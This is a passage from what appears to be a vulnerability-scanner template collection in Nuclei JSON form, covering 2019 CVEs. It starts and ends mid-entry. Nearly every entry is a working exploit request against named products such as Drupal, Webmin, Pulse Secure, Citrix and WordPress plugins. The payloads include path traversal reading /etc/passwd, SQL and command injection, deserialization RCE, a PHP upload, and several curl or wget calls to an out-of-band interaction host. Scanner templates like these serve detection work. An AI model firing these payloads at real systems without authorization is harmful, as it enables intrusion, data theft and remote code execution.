xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-10475","info":{"name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-12461","info":{"name":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain);</script><script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl 